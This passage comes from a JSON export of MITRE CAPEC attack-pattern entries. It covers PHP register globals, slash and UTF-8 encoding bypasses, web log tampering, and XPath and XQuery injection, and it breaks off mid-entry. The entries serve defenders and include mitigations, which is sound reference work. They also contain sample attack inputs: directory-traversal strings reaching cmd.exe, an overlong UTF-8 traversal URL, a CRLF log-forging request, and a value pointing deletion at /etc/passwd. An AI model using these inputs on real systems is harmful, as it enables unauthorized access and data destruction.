is that the coder does not initialize the variable to zero before entering the loop. This is fine because PHP initializes the variable on declaration. The result is code that seems to function, regardless of badness. The problem is that a user of the Web application can supply a request such as","and cause $count to start out at the value 9, resulting in only one trip through the loop. Yerg.","Depending on the configuration, PHP may accept user-supplied variables in place of environment variables. PHP initializes global variables for all process environment variables, such as $PATH and $HOSTNAME. These variables are of critical importance because they may be used in file or network operations. If an attacker can supply a new $PATH variable (such as PATH=\'/var\'), the program may be exploitable.","PHP may also take field tags supplied in GET/POST requests and transform them into global variables. This is the case with the $count variable we explored in our previous example.","Consider another example of this problem in which a program defines a variable called $tempfile. An attacker can supply a new temp file such as $tempfile = \\"/etc/passwd\\". Then the temp file may get erased later via a call to unlink($tempfile);. Now the passwd file has been erased--a bad thing indeed on most OSs.","Also consider that the use of include() and require() first search $PATH, and that using calls to the shell may execute crucial programs such as ls. In this way, ls may be \\"Trojaned\\" (the attacker can modify $PATH to cause a Trojan copy of ls to be loaded). This type of attack could also apply to loadable libraries if $LD_LIBRARY_PATH is modified.","Finally, some versions of PHP may pass user data to syslog as a format string, thus exposing the application to a format string buffer overflow."]}},"Related_Weaknesses":{"Related_Weakness":[{"CWE_ID":"15"},{"CWE_ID":"94"},{"CWE_ID":"96"},{"CWE_ID":"285"},{"CWE_ID":"302"},{"CWE_ID":"473"},{"CWE_ID":"1321"}]},"References":{"Reference":[{"External_Reference_ID":"REF-1"},{"External_Reference_ID":"REF-520"},{"External_Reference_ID":"REF-521"},{"External_Reference_ID":"REF-522","Section":"Chapter 29. Using Register Globals"}]},"Content_History":{"Submission":{"Submission_Name":"CAPEC Content Team","Submission_Organization":"The MITRE Corporation","Submission_Date":"2014-06-23"},"Modification":[{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2017-01-09","Modification_Comment":"Updated Related_Attack_Patterns"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2019-04-04","Modification_Comment":"Updated Related_Attack_Patterns"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2020-07-30","Modification_Comment":"Updated Execution_Flow, Mitigations, Skills_Required"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2020-12-17","Modification_Comment":"Updated Related_Weaknesses"}]}},"78":{"ID":"78","Name":"Using Escaped Slashes in Alternate Encoding","Abstraction":"Detailed","Status":"Draft","Description":"This attack targets the use of the backslash in alternate encoding. An attacker can provide a backslash as a leading character and causes a parser to believe that the next character is special. This is called an escape. By using that trick, the attacker tries to exploit alternate ways to encode the same character which leads to filter problems and opens avenues to attack.","Likelihood_Of_Attack":"High","Typical_Severity":"High","Related_Attack_Patterns":{"Related_Attack_Pattern":{"Nature":"ChildOf","CAPEC_ID":"267"}},"Execution_Flow":{"Attack_Step":[{"Step":"1","Phase":"Experiment","Description":"The attacker can send input data to the host target (e.g., via http request or command line request"},{"Step":"2","Phase":"Experiment","Description":"The attacker craft malicious input data which includes escaped slashes. The attacker may need multiple attempts before finding a successful combination."}]},"Prerequisites":{"Prerequisite":["The application accepts the backlash character as escape character.","The application server does incomplete input data decoding, filtering and validation."]},"Skills_Required":{"Skill":["The attacker can naively try backslash character and discover that the target host uses it as escape character.",{"Level":"Low"},"The attacker may need deep understanding of the host target in order to exploit the vulnerability. The attacker may also use automated tools to probe for this vulnerability.",{"Level":"Medium"}]},"Indicators":{"Indicator":"An attacker can use a fuzzer in order to probe for this vulnerability. The fuzzer should generate suspicious network activity noticeable by an intrusion detection system."},"Consequences":{"Consequence":[{"Scope":"Confidentiality","Impact":"Read Data"},{"Scope":"Availability","Impact":"Resource Consumption","Note":"Denial of Service"},{"Scope":["Confidentiality","Integrity","Availability"],"Impact":"Execute Unauthorized Commands","Note":"Run Arbitrary Code"},{"Scope":["Confidentiality","Access Control","Authorization"],"Impact":"Bypass Protection Mechanism"}]},"Mitigations":{"Mitigation":["Verify that the user-supplied data does not use backslash character to escape malicious characters.","Assume all input is malicious. Create an allowlist that defines all valid input to the software system based on the requirements specifications. Input that does not match against the allowlist should not be permitted to enter into the system.","Be aware of the threat of alternative method of data encoding.","Regular expressions can be used to filter out backslash. Make sure you decode before filtering and validating the untrusted input data.","In the case of path traversals, use the principle of least privilege when determining access rights to file systems. Do not allow users to access directories/files that they should not access.","Any security checks should occur after the data has been decoded and validated as correct data format. Do not repeat decoding process, if bad character are left after decoding process, treat the data as suspicious, and fail the validation process.","Avoid making decisions based on names of resources (e.g. files) if those resources can have alternate names."]},"Example_Instances":{"Example":[{"p":"For example, the byte pair \\\\0 might result in a single zero byte (a NULL) being sent. Another example is \\\\t, which is sometimes converted into a tab character. There is often an equivalent encoding between the back slash and the escaped back slash. This means that \\\\/ results in a single forward slash. A single forward slash also results in a single forward slash. The encoding looks like this:","div":["/ yields /",{"style":"margin-left:10px;","class":"informative"}]},{"div":["Attack Example: Escaped Slashes in Alternate Encodings",{"style":"color:#32498D; font-weight:bold;"},"CWD ..\\\\/..\\\\/..\\\\/..\\\\/winnt",{"style":"margin-left:10px;","class":"informative"},"CWD ../../../../winnt",{"style":"margin-left:10px;","class":"informative"},"int main(int argc, char* argv[])",{"style":"margin-left:10px;","class":"informative","div":["puts(\\"\\\\/ \\\\\\\\ \\\\? \\\\. \\\\| \\");",{"style":"margin-left:10px;"}]},"/ \\\\ ? . |",{"style":"margin-left:10px;","class":"informative"},"CWD ..\\\\?\\\\?\\\\?\\\\?\\\\/..\\\\/..\\\\/..\\\\/winnt",{"style":"margin-left:10px;","class":"informative"}],"p":["An attack leveraging this pattern is very simple. If you believe the target may be filtering the slash, attempt to supply \\\\/ and see what happens. Example command strings to try out include","which converts in many cases to","To probe for this kind of problem, a small C program that uses string output routines can be very useful. File system calls make excellent testing fodder. The simple snippet","produces the output","Clearly, the back slash is ignored, and thus we have hit on a number of alternative encodings to experiment with. Given our previous example, we can extend the attack to include other possibilities:"]}]},"Related_Weaknesses":{"Related_Weakness":[{"CWE_ID":"180"},{"CWE_ID":"181"},{"CWE_ID":"173"},{"CWE_ID":"172"},{"CWE_ID":"73"},{"CWE_ID":"22"},{"CWE_ID":"74"},{"CWE_ID":"20"},{"CWE_ID":"697"},{"CWE_ID":"707"}]},"References":{"Reference":{"External_Reference_ID":"REF-1"}},"Content_History":{"Submission":{"Submission_Name":"CAPEC Content Team","Submission_Organization":"The MITRE Corporation","Submission_Date":"2014-06-23"},"Modification":[{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2017-01-09","Modification_Comment":"Updated Related_Attack_Patterns"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2018-07-31","Modification_Comment":"Updated References"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2020-07-30","Modification_Comment":"Updated Mitigations"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2021-06-24","Modification_Comment":"Updated Related_Weaknesses"}]}},"79":{"ID":"79","Name":"Using Slashes in Alternate Encoding","Abstraction":"Detailed","Status":"Draft","Description":"This attack targets the encoding of the Slash characters. An attacker would try to exploit common filtering problems related to the use of the slashes characters to gain access to resources on the target host. Directory-driven systems, such as file systems and databases, typically use the slash character to indicate traversal between directories or other container components. For murky historical reasons, PCs (and, as a result, Microsoft OSs) choose to use a backslash, whereas the UNIX world typically makes use of the forward slash. The schizophrenic result is that many MS-based systems are required to understand both forms of the slash. This gives the attacker many opportunities to discover and abuse a number of common filtering problems. The goal of this pattern is to discover server software that only applies filters to one version, but not the other.","Likelihood_Of_Attack":"High","Typical_Severity":"High","Related_Attack_Patterns":{"Related_Attack_Pattern":{"Nature":"ChildOf","CAPEC_ID":"267"}},"Execution_Flow":{"Attack_Step":[{"Step":"1","Phase":"Experiment","Description":"The attacker has access to a resource path and required to use slashes as resource delimiter."},{"Step":"2","Phase":"Experiment","Description":"The attacker tries variation and combination of the slashes characters in different encoding format."},{"Step":"3","Phase":"Experiment","Description":"The attacker found an unfiltered combination which maps to a valid path and accesses unauthorized resources (directories, files, etc.)"}]},"Prerequisites":{"Prerequisite":["The application server accepts paths to locate resources.","The application server does insufficient input data validation on the resource path requested by the user.","The access right to resources are not set properly."]},"Skills_Required":{"Skill":["An attacker can try variation of the slashes characters.",{"Level":"Low"},"An attacker can use more sophisticated tool or script to scan a website and find a path filtering problem.",{"Level":"Medium"}]},"Indicators":{"Indicator":["If the first path decoding process has left some invalid or denylisted characters, that may be a sign that the request is malicious.","Traffic filtering with IDS (or proxy) can detect request with suspicious URLs. IDS may use signature based identification to reveal such URL based attacks.","An attacker can use a fuzzer in order to probe for a UTF-8 encoding vulnerability. The fuzzer should generate suspicious network activity."]},"Consequences":{"Consequence":[{"Scope":"Confidentiality","Impact":"Read Data"},{"Scope":["Confidentiality","Integrity","Availability"],"Impact":"Execute Unauthorized Commands","Note":"Run Arbitrary Code"},{"Scope":["Confidentiality","Access Control","Authorization"],"Impact":"Gain Privileges"}]},"Mitigations":{"Mitigation":["Any security checks should occur after the data has been decoded and validated as correct data format. Do not repeat decoding process, if bad character are left after decoding process, treat the data as suspicious, and fail the validation process. Refer to the RFCs to safely decode URL.","When client input is required from web-based forms, avoid using the \\"GET\\" method to submit data, as the method causes the form data to be appended to the URL and is easily manipulated. Instead, use the \\"POST method whenever possible.","There are tools to scan HTTP requests to the server for valid URL such as URLScan from Microsoft (http://www.microsoft.com/technet/security/tools/urlscan.mspx)","Be aware of the threat of alternative method of data encoding and obfuscation technique such as IP address encoding. (See related guideline section)","Test your path decoding process against malicious input.","In the case of path traversals, use the principle of least privilege when determining access rights to file systems. Do not allow users to access directories/files that they should not access.","Assume all input is malicious. Create an allowlist that defines all valid input to the application based on the requirements specifications. Input that does not match against the allowlist should not be permitted to enter into the system."]},"Example_Instances":{"Example":{"div":["Attack Example: Slashes in Alternate Encodings",{"style":"color:#32498D; font-weight:bold;"},"http://target server/some_directory\\\\..\\\\..\\\\..\\\\winnt",{"style":"margin-left:10px;","class":"informative"},"http://target server/some_directory/../../../winnt",{"style":"margin-left:10px;","class":"informative"},"http://target server/some_directory\\\\..%5C..%5C..\\\\winnt",{"style":"margin-left:10px;","class":"informative"}],"p":["The two following requests are equivalent on most Web servers:","is equivalent to","Multiple encoding conversion problems can also be leveraged as various slashes are instantiated in URL-encoded, UTF-8, or Unicode. Consider the strings","where %5C is equivalent to the \\\\ character."]}},"Related_Weaknesses":{"Related_Weakness":[{"CWE_ID":"173"},{"CWE_ID":"180"},{"CWE_ID":"181"},{"CWE_ID":"20"},{"CWE_ID":"74"},{"CWE_ID":"73"},{"CWE_ID":"22"},{"CWE_ID":"185"},{"CWE_ID":"200"},{"CWE_ID":"697"},{"CWE_ID":"707"}]},"References":{"Reference":[{"External_Reference_ID":"REF-1"},{"External_Reference_ID":"REF-525"},{"External_Reference_ID":"REF-495"}]},"Content_History":{"Submission":{"Submission_Name":"CAPEC Content Team","Submission_Organization":"The MITRE Corporation","Submission_Date":"2014-06-23"},"Modification":[{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2017-01-09","Modification_Comment":"Updated Related_Attack_Patterns"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2020-07-30","Modification_Comment":"Updated Indicators, Mitigations"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2021-06-24","Modification_Comment":"Updated Related_Weaknesses"}]}},"80":{"ID":"80","Name":"Using UTF-8 Encoding to Bypass Validation Logic","Abstraction":"Detailed","Status":"Draft","Description":"This attack is a specific variation on leveraging alternate encodings to bypass validation logic. This attack leverages the possibility to encode potentially harmful input in UTF-8 and submit it to applications not expecting or effective at validating this encoding standard making input filtering difficult. UTF-8 (8-bit UCS/Unicode Transformation Format) is a variable-length character encoding for Unicode. Legal UTF-8 characters are one to four bytes long. However, early version of the UTF-8 specification got some entries wrong (in some cases it permitted overlong characters). UTF-8 encoders are supposed to use the \\"shortest possible\\" encoding, but naive decoders may accept encodings that are longer than necessary. According to the RFC 3629, a particularly subtle form of this attack can be carried out against a parser which performs security-critical validity checks against the UTF-8 encoded form of its input, but interprets certain illegal octet sequences as characters.","Likelihood_Of_Attack":"High","Typical_Severity":"High","Related_Attack_Patterns":{"Related_Attack_Pattern":[{"Nature":"PeerOf","CAPEC_ID":"64"},{"Nature":"PeerOf","CAPEC_ID":"71"},{"Nature":"ChildOf","CAPEC_ID":"267"}]},"Execution_Flow":{"Attack_Step":[{"Step":"1","Phase":"Explore","Description":"[Survey the application for user-controllable inputs] Using a browser or an automated tool, an attacker follows all public links and actions on a web site. They record all the links, the forms, the resources accessed and all other potential entry-points for the web application.","Technique":["Use a spidering tool to follow and record all links and analyze the web pages to find entry points. Make special note of any links that include parameters in the URL.","Use a proxy tool to record all user input entry points visited during a manual traversal of the web application.","Use a browser to manually explore the website and analyze how it is constructed. Many browsers\' plugins are available to facilitate the analysis or automate the discovery."]},{"Step":"2","Phase":"Experiment","Description":"[Probe entry points to locate vulnerabilities] The attacker uses the entry points gathered in the \\"Explore\\" phase as a target list and injects various UTF-8 encoded payloads to determine if an entry point actually represents a vulnerability with insufficient validation logic and to characterize the extent to which the vulnerability can be exploited.","Technique":["Try to use UTF-8 encoding of content in Scripts in order to bypass validation routines.","Try to use UTF-8 encoding of content in HTML in order to bypass validation routines.","Try to use UTF-8 encoding of content in CSS in order to bypass validation routines."]}]},"Prerequisites":{"Prerequisite":["The application\'s UTF-8 decoder accepts and interprets illegal UTF-8 characters or non-shortest format of UTF-8 encoding.","Input filtering and validating is not done properly leaving the door open to harmful characters for the target host."]},"Skills_Required":{"Skill":["An attacker can inject different representation of a filtered character in UTF-8 format.",{"Level":"Low"},"An attacker may craft subtle encoding of input data by using the knowledge that they have gathered about the target host.",{"Level":"Medium"}]},"Indicators":{"Indicator":["A web page that contains overly long UTF-8 codes constitute a protocol anomaly, and could be an indication that an attacker is attempting to exploit a vulnerability on the target host.","An attacker can use a fuzzer in order to probe for a UTF-8 encoding vulnerability. The fuzzer should generate suspicious network activity noticeable by an intrusion detection system.","An IDS filtering network traffic may be able to detect illegal UTF-8 characters."]},"Consequences":{"Consequence":[{"Scope":["Confidentiality","Access Control","Authorization"],"Impact":"Bypass Protection Mechanism"},{"Scope":["Confidentiality","Integrity","Availability"],"Impact":"Execute Unauthorized Commands","Note":"Run Arbitrary Code"},{"Scope":"Integrity","Impact":"Modify Data"},{"Scope":"Availability","Impact":"Unreliable Execution"}]},"Mitigations":{"Mitigation":["The Unicode Consortium recognized multiple representations to be a problem and has revised the Unicode Standard to make multiple representations of the same code point with UTF-8 illegal. The UTF-8 Corrigendum lists the newly restricted UTF-8 range (See references). Many current applications may not have been revised to follow this rule. Verify that your application conform to the latest UTF-8 encoding specification. Pay extra attention to the filtering of illegal characters.",{"p":["The exact response required from an UTF-8 decoder on invalid input is not uniformly defined by the standards. In general, there are several ways a UTF-8 decoder might behave in the event of an invalid byte sequence:","It is possible for a decoder to behave in different ways for different types of invalid input.","RFC 3629 only requires that UTF-8 decoders must not decode \\"overlong sequences\\" (where a character is encoded in more bytes than needed but still adheres to the forms above). The Unicode Standard requires a Unicode-compliant decoder to \\"...treat any ill-formed code unit sequence as an error condition. This guarantees that it will neither interpret nor emit an ill-formed code unit sequence.\\"","Overlong forms are one of the most troublesome types of UTF-8 data. The current RFC says they must not be decoded but older specifications for UTF-8 only gave a warning and many simpler decoders will happily decode them. Overlong forms have been used to bypass security validations in high profile products including Microsoft\'s IIS web server. Therefore, great care must be taken to avoid security issues if validation is performed before conversion from UTF-8, and it is generally much simpler to handle overlong forms before any input validation is done.","To maintain security in the case of invalid input, there are two options. The first is to decode the UTF-8 before doing any input validation checks. The second is to use a decoder that, in the event of invalid input, returns either an error or text that the application considers to be harmless. Another possibility is to avoid conversion out of UTF-8 altogether but this relies on any other software that the data is passed to safely handling the invalid data.","Another consideration is error recovery. To guarantee correct recovery after corrupt or lost bytes, decoders must be able to recognize the difference between lead and trail bytes, rather than just assuming that bytes will be of the type allowed in their position."],"div":{"style":"margin-left:10px;","ul":{"li":["1. Insert a replacement character (e.g. \'?\', \'\').","2. Ignore the bytes.","3. Interpret the bytes according to a different character encoding (often the ISO-8859-1 character map).","4. Not notice and decode as if the bytes were some similar bit of UTF-8.","5. Stop decoding and report an error (possibly giving the caller the option to continue)."]}}},"For security reasons, a UTF-8 decoder must not accept UTF-8 sequences that are longer than necessary to encode a character. If you use a parser to decode the UTF-8 encoding, make sure that parser filter the invalid UTF-8 characters (invalid forms or overlong forms).","Look for overlong UTF-8 sequences starting with malicious pattern. You can also use a UTF-8 decoder stress test to test your UTF-8 parser (See Markus Kuhn\'s UTF-8 and Unicode FAQ in reference section)","Assume all input is malicious. Create an allowlist that defines all valid input to the software system based on the requirements specifications. Input that does not match against the allowlist should not be permitted to enter into the system. Test your decoding process against malicious input."]},"Example_Instances":{"Example":{"p":["Perhaps the most famous UTF-8 attack was against unpatched Microsoft Internet Information Server (IIS) 4 and IIS 5 servers. If an attacker made a request that looked like this","the server didn\'t correctly handle %c0%af in the URL. What do you think %c0%af means? It\'s 11000000 10101111 in binary; and if it\'s broken up using the UTF-8 mapping rules, we get this: 11000000 10101111. Therefore, the character is 00000101111, or 0x2F, the slash (/) character! The %c0%af is an invalid UTF-8 representation of the / character. Such an invalid UTF-8 escape is often referred to as an overlong sequence.","So when the attacker requested the tainted URL, they accessed","In other words, they walked out of the script\'s virtual directory, which is marked to allow program execution, up to the root and down into the system32 directory, where they could pass commands to the command shell, Cmd.exe."],"div":["http://servername/scripts/..%c0%af../winnt/system32/ cmd.exe",{"style":"margin-left:10px;","class":"attack"},"http://servername/scripts/../../winnt/system32/cmd.exe",{"style":"margin-left:10px;","class":"result"}]}},"Related_Weaknesses":{"Related_Weakness":[{"CWE_ID":"173"},{"CWE_ID":"172"},{"CWE_ID":"180"},{"CWE_ID":"181"},{"CWE_ID":"73"},{"CWE_ID":"74"},{"CWE_ID":"20"},{"CWE_ID":"697"},{"CWE_ID":"692"}]},"References":{"Reference":[{"External_Reference_ID":"REF-1"},{"External_Reference_ID":"REF-112","Section":"5.9. Character Encoding"},{"External_Reference_ID":"REF-530","Section":"Chapter 12"},{"External_Reference_ID":"REF-531"},{"External_Reference_ID":"REF-532","Section":"UTF-8"},{"External_Reference_ID":"REF-533"},{"External_Reference_ID":"REF-114"},{"External_Reference_ID":"REF-535"},{"External_Reference_ID":"REF-525"},{"External_Reference_ID":"REF-537"}]},"Content_History":{"Submission":{"Submission_Name":"CAPEC Content Team","Submission_Organization":"The MITRE Corporation","Submission_Date":"2014-06-23"},"Modification":[{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2018-07-31","Modification_Comment":"Updated References"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2020-07-30","Modification_Comment":"Updated Example_Instances, Execution_Flow, Mitigations, Skills_Required"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2021-06-24","Modification_Comment":"Updated Related_Weaknesses"}]}},"81":{"ID":"81","Name":"Web Logs Tampering","Abstraction":"Detailed","Status":"Draft","Description":"Web Logs Tampering attacks involve an attacker injecting, deleting or otherwise tampering with the contents of web logs typically for the purposes of masking other malicious behavior. Additionally, writing malicious data to log files may target jobs, filters, reports, and other agents that process the logs in an asynchronous attack pattern. This pattern of attack is similar to \\"Log Injection-Tampering-Forging\\" except that in this case, the attack is targeting the logs of the web server and not the application.","Likelihood_Of_Attack":"Medium","Typical_Severity":"High","Related_Attack_Patterns":{"Related_Attack_Pattern":{"Nature":"ChildOf","CAPEC_ID":"268"}},"Execution_Flow":{"Attack_Step":[{"Step":"1","Phase":"Explore","Description":"[Determine Application Web Server Log File Format] The attacker observes the system and looks for indicators of which logging utility is being used by the web server.","Technique":"Determine logging utility being used by application web server (e.g. log4j), only possible if the application is known by the attacker or if the application returns error messages with logging utility information."},{"Step":"2","Phase":"Experiment","Description":"[Determine Injectable Content] The attacker launches various logged actions with malicious data to determine what sort of log injection is possible.","Technique":"Attacker triggers logged actions with maliciously crafted data as inputs, parameters, arguments, etc."},{"Step":"3","Phase":"Exploit","Description":"[Manipulate Log Files] The attacker alters the log contents either directly through manipulation or forging or indirectly through injection of specially crafted request that the web server will receive and write into the logs. This type of attack typically follows another attack and is used to try to cover the traces of the previous attack.","Technique":[{"p":["Indirectly through injection, use carriage return and/or line feed characters to start a new line in the log file, and then, add a fake entry.","For example: The HTTP request for \\"/index.html%0A%0DIP_ADDRESS- - DATE_FORMAT] \\"GET /forged-path HTTP/1.1\\" 200 - \\"-\\" USER_AGENT\\" may add the log line into Apache \\"access_log\\" (for example). Different applications may require different encodings of the carriage return and line feed characters."]},{"p":["Directly through log file or database manipulation, use carriage return and/or line feed characters to start a new line in the log file, and then, add a fake entry.","For example: The HTTP request for \\"/index.html%0A%0DIP_ADDRESS- - DATE_FORMAT] \\"GET /forged-path HTTP/1.1\\" 200 - \\"-\\" USER_AGENT\\" may add the log line into Apache \\"access_log\\" (for example). Different applications may require different encodings of the carriage return and line feed characters."]},"Directly through log file or database manipulation, modify existing log entries."]}]},"Prerequisites":{"Prerequisite":"Target server software must be a HTTP server that performs web logging."},"Skills_Required":{"Skill":["To input faked entries into Web logs",{"Level":"Low"}]},"Resources_Required":{"Resource":"Ability to send specially formatted HTTP request to web server"},"Consequences":{"Consequence":{"Scope":"Integrity","Impact":"Modify Data"}},"Mitigations":{"Mitigation":["Design: Use input validation before writing to web log","Design: Validate all log data before it is output"]},"Example_Instances":{"Example":"Most web servers have a public interface, even if the majority of the site is password protected, there is usually at least a login site and brochureware that is publicly available. HTTP requests to the site are also generally logged to a Web log. From an attacker point of view, standard HTTP requests containing a malicious payload can be sent to the public website (with no other access required), when those requests appear in the log (such as http://victimsite/index.html?< malicious script> if they are followed by an administrator this may be sufficient to probe the administrator\'s host or local network."},"Related_Weaknesses":{"Related_Weakness":[{"CWE_ID":"117"},{"CWE_ID":"93"},{"CWE_ID":"75"},{"CWE_ID":"221"},{"CWE_ID":"96"},{"CWE_ID":"20"},{"CWE_ID":"150"},{"CWE_ID":"276"},{"CWE_ID":"279"},{"CWE_ID":"116"}]},"References":{"Reference":{"External_Reference_ID":"REF-1"}},"Content_History":{"Submission":{"Submission_Name":"CAPEC Content Team","Submission_Organization":"The MITRE Corporation","Submission_Date":"2014-06-23"},"Modification":[{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2017-05-01","Modification_Comment":"Updated Related_Weaknesses"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2021-06-24","Modification_Comment":"Updated Related_Weaknesses"}]}},"83":{"ID":"83","Name":"XPath Injection","Abstraction":"Detailed","Status":"Draft","Description":"An attacker can craft special user-controllable input consisting of XPath expressions to inject the XML database and bypass authentication or glean information that they normally would not be able to. XPath Injection enables an attacker to talk directly to the XML database, thus bypassing the application completely. XPath Injection results from the failure of an application to properly sanitize input used as part of dynamic XPath expressions used to query an XML database.","Likelihood_Of_Attack":"High","Typical_Severity":"High","Related_Attack_Patterns":{"Related_Attack_Pattern":{"Nature":"ChildOf","CAPEC_ID":"250"}},"Execution_Flow":{"Attack_Step":[{"Step":"1","Phase":"Explore","Description":"[Survey the target] Using a browser or an automated tool, an attacker records all instances of user-controllable input used to contruct XPath queries.","Technique":["Use an automated tool to record all instances of user-controllable input used to contruct XPath queries.","Use a browser to manually explore the website and analyze how the application processes inputs."]},{"Step":"2","Phase":"Explore","Description":"[Determines the structure of queries] Using manual or automated means, query inputs found for XPath weaknesses.","Technique":["Use an automated tool automatically probe the inputs for XPath weaknesses.","Manually probe the inputs using characters such as single quote (\') that can cause XPath-releated errors, thus indicating an XPath weakness."]},{"Step":"3","Phase":"Exploit","Description":"[Exploit the target] Craft malicious content containing XPath expressions that is not validated by the application and is executed as part of the XPath queries.","Technique":"Use the crafted input to execute unexpected queries that can disclose sensitive database information to the attacker."}]},"Prerequisites":{"Prerequisite":["XPath queries used to retrieve information stored in XML documents","User-controllable input not properly sanitized before being used as part of XPath queries"]},"Skills_Required":{"Skill":["XPath Injection shares the same basic premises with SQL Injection. An attacker must have knowledge of XPath syntax and constructs in order to successfully leverage XPath Injection",{"Level":"Low"}]},"Resources_Required":{"Resource":"None: No specialized resources are required to execute this type of attack."},"Indicators":{"Indicator":"Too many exceptions generated by the application as a result of malformed XPath queries"},"Consequences":{"Consequence":[{"Scope":["Confidentiality","Access Control","Authorization"],"Impact":"Gain Privileges"},{"Scope":"Confidentiality","Impact":"Read Data"}]},"Mitigations":{"Mitigation":["Strong input validation - All user-controllable input must be validated and filtered for illegal characters as well as content that can be interpreted in the context of an XPath expression. Characters such as a single-quote(\') or operators such as or (|), and (&) and such should be filtered if the application does not expect them in the context in which they appear. If such content cannot be filtered, it must at least be properly escaped to avoid them being interpreted as part of XPath expressions.","Use of parameterized XPath queries - Parameterization causes the input to be restricted to certain domains, such as strings or integers, and any input outside such domains is considered invalid and the query fails.","Use of custom error pages - Attackers can glean information about the nature of queries from descriptive error messages. Input validation must be coupled with customized error pages that inform about an error without disclosing information about the database or application."]},"Example_Instances":{"Example":"Consider an application that uses an XML database to authenticate its users. The application retrieves the user name and password from a request and forms an XPath expression to query the database. An attacker can successfully bypass authentication and login without valid credentials through XPath Injection. This can be achieved by injecting the query to the XML database with XPath syntax that causes the authentication check to fail. Improper validation of user-controllable input and use of a non-parameterized XPath expression enable the attacker to inject an XPath expression that causes authentication bypass."},"Related_Weaknesses":{"Related_Weakness":[{"CWE_ID":"91"},{"CWE_ID":"74"},{"CWE_ID":"20"},{"CWE_ID":"707"}]},"Taxonomy_Mappings":{"Taxonomy_Mapping":[{"Taxonomy_Name":"WASC","Entry_ID":"39","Entry_Name":"XPath Injection"},{"Taxonomy_Name":"OWASP Attacks","Entry_Name":"Blind XPath Injection"},{"Taxonomy_Name":"OWASP Attacks","Entry_Name":"XPATH Injection"}]},"References":{"Reference":{"External_Reference_ID":"REF-611","Section":"Testing for XPATH Injection"}},"Content_History":{"Submission":{"Submission_Name":"CAPEC Content Team","Submission_Organization":"The MITRE Corporation","Submission_Date":"2014-06-23"},"Modification":[{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2017-08-04","Modification_Comment":"Updated Attack_Phases, Description Summary, Resources_Required"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2018-07-31","Modification_Comment":"Updated References, Related_Weaknesses"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2020-07-30","Modification_Comment":"Updated Description"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2020-12-17","Modification_Comment":"Updated References, Taxonomy_Mappings"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2021-06-24","Modification_Comment":"Updated Related_Weaknesses"}]}},"84":{"ID":"84","Name":"XQuery Injection","Abstraction":"Detailed","Status":"Draft","Description":"This attack utilizes XQuery to probe and attack server systems; in a similar manner that SQL Injection allows an attacker to exploit SQL calls to RDBMS, XQuery Injection uses improperly validated data that is passed to XQuery commands to traverse and execute commands that the XQuery routines have access to. XQuery injection can be used to enumerate elements on the victim\'s environment, inject commands to the local host, or execute queries to remote files and data sources.","Likelihood_Of_Attack":"High","Typical_Severity":"Very High","Related_Attack_Patterns":{"Related_Attack_Pattern":{"Nature":"ChildOf","CAPEC_ID":"250"}},"Execution_Flow":{"Attack_Step":[{"Step":"1","Phase":"Explore","Description":"[Survey the application for user-controllable inputs] Using a browser or an automated tool, an attacker follows all public links and actions on a web site. They record all the links, the forms, the resources accessed and all other potential entry-points for the web application.","Technique":["Use a spidering tool to follow and record all links and analyze the web pages to find entry points. Make special note of any links that include parameters in the URL.","Use a proxy tool to record all user input entry points visited during a manual traversal of the web application.","Use a browser to manually explore the website and analyze how it is constructed. Many browsers\' plugins are available to facilitate the analysis or automate the discovery."]},{"Step":"2","Phase":"Experiment","Description":"[Determine user-controllable input susceptible to injection] Determine the user-controllable input susceptible to injection. For each user-controllable input that the attacker suspects is vulnerable to XQL injection, attempt to inject characters that have special meaning in XQL. The goal is to create an XQL query with an invalid syntax.","Technique":["Use web browser to inject input through text fields or through HTTP GET parameters.","Use a web application debugging tool such as Tamper Data, TamperIE, WebScarab,etc. to modify HTTP POST parameters, hidden fields, non-freeform fields, etc.","Use XML files to inject input.","Use network-level packet injection tools such as netcat to inject input","Use modified client (modified by reverse engineering) to inject input."]},{"Step":"3","Phase":"Exploit","Description":"[Information Disclosure] The attacker crafts and injects an XQuery payload which is acted on by an XQL query leading to inappropriate disclosure of information.","Technique":"Leveraging one of the vulnerable inputs identified during the Experiment phase, inject malicious XQuery payload. The payload aims to get information on the structure of the underlying XML database and/or the content in it."},{"Step":"4","Phase":"Exploit","Description":"[Manipulate the data in the XML database] The attacker crafts and injects an XQuery payload which is acted on by an XQL query leading to modification of application data.","Technique":"Leveraging one of the vulnerable inputs identified during the Experiment phase, inject malicious XQuery payload.. The payload tries to insert or replace data in the XML database."}]},"Prerequisites":{"Prerequisite":"The XQL must execute unvalidated data"},"Skills_Required":{"Skill":["Basic understanding of XQuery",{"Level":"Low"}]},"Consequences":{"Consequence":[{"Scope":"Integrity","Impact":"Modify Data"},{"Scope":"Confidentiality","Impact":"Read 